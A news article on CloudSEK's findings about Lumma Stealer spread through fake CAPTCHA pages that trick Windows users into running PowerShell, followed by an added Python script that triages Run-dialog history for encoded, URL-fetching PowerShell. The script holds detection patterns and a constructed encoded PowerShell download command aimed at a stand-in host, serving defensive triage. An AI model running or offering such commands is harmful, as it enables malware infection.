
Lumma Stealer Malware Being Spread to Windows Devices via Fake Human Verification Pages, CloudSEK Says



Lumma Stealer, a recently identified information-stealing malware, is being distributed to users via fake human verification pages. According to researchers at the cybersecurity firm CloudSEK, the malware is targeting Windows devices and is designed to steal sensitive information from the infected device. Concerningly, researchers have discovered multiple phishing websites which are deploying these fake verification pages to trick users into downloading the malware. CloudSEK researchers have warned organisations to implement endpoint protection solutions and to train employees and users about this new social engineering tactic.

Lumma Stealer Malware Being Distributed Using New Phishing Technique

According to the CloudSEK report, multiple active websites were found to be spreading the Lumma Stealer malware. The technique was first discovered by Unit42 at Palo Alto Networks, a cybersecurity firm, but the scope of the distribution chain is now believed to be much larger than previously assumed.

The attackers have set up various malicious websites and have added a fake human verification system, resembling the Completely Automated Public Turing test to tell Computers and Humans Apart (CAPTCHA) page. However, unlike the regular CAPTCHA page where users have to check a few boxes or perform similar pattern-based tasks to prove they are not a bot, the fake pages instruct the user to run some unusual commands.

In one instance, the researchers spotted a fake verification page asking users to execute a PowerShell script. PowerShell scripts contain a series of commands that can be executed in the Run dialog box. In this case, the commands were found to fetch the content from the a.txt file hosted on a remote server. This prompted a file to be downloaded and extracted on the Windows system, infecting it with Lumma Stealer.

The report also listed the malicious URLs which were spotted distributing the malware to unsuspecting users. However, this is not the full list and there might be more such websites carrying out the attack.


The researchers also observed that content delivery networks (CDNs) were being used to spread these fake verification pages. Further, the attackers were spotted using base64 encoding and clipboard manipulation to evade detection. It is also possible to distribute other malware using the same technique, although such instances have not been seen so far.

Since the modus operandi of the attack is based on phishing techniques, no security patch can prevent devices from getting infected. However, there are some steps users and organisations can take to safeguard against the Lumma Stealer malware.

As per the report, users and employees should be made aware of this phishing tactic to help them not fall for it. Additionally, organisations should implement and maintain reliable endpoint protection solutions to detect and block PowerShell-based attacks. Further, regularly updating and patching systems to reduce the vulnerabilities that Lumma Stealer malware can exploit should also help.
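One way to triage Run-dialog history for the pattern this article describes, given here as an added example that is not code from CloudSEK or the original article. It assumes the entries were exported from the per-user `RunMRU` registry key (whose values end in `\1`); the sample entries, the `example.invalid` URL and the function names are constructed for illustration.

```python
import base64
import re

# PowerShell accepts -e, -ec, -enc ... -EncodedCommand followed by base64 (UTF-16LE).
ENC_FLAG = re.compile(r"(?i)(?:^|\s)[-/](e[a-z]*)\s+([A-Za-z0-9+/=]{16,})")
URL = re.compile(r"(?i)https?://[^\s'\"()]+")
HOST = re.compile(r"(?i)\b(powershell|pwsh)(\.exe)?\b")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or invalid."""
    for m in ENC_FLAG.finditer(cmdline):
        name = m.group(1).lower()
        if not ("encodedcommand".startswith(name) or name == "ec"):
            continue  # some other flag that merely starts with "e"
        try:
            return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
        except ValueError:  # bad base64 or not valid UTF-16LE
            return None
    return None


def triage(entry):
    """Return the reasons a Run-dialog history value looks like a pasted script."""
    cmd = entry[:-2] if entry.endswith("\\1") else entry  # strip RunMRU suffix
    reasons = []
    if HOST.search(cmd):
        reasons.append("script-host")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded-command")
    if URL.search(cmd) or (decoded and URL.search(decoded)):
        reasons.append("remote-url")
    return reasons


def _enc(text):
    # Builds the constructed sample below; not part of the detection logic.
    return base64.b64encode(text.encode("utf-16-le")).decode()


# Constructed sample entries (not taken from the report).
SAMPLES = [
    "notepad\\1",
    "powershell -enc " + _enc("Invoke-WebRequest https://example.invalid/a.txt") + "\\1",
    "powershell -NoProfile Get-Date\\1",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(triage(s), s[:60])
```

An entry that combines a script host, an encoded command and a remote URL is the one worth escalating; a script host alone is common on administrator workstations.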
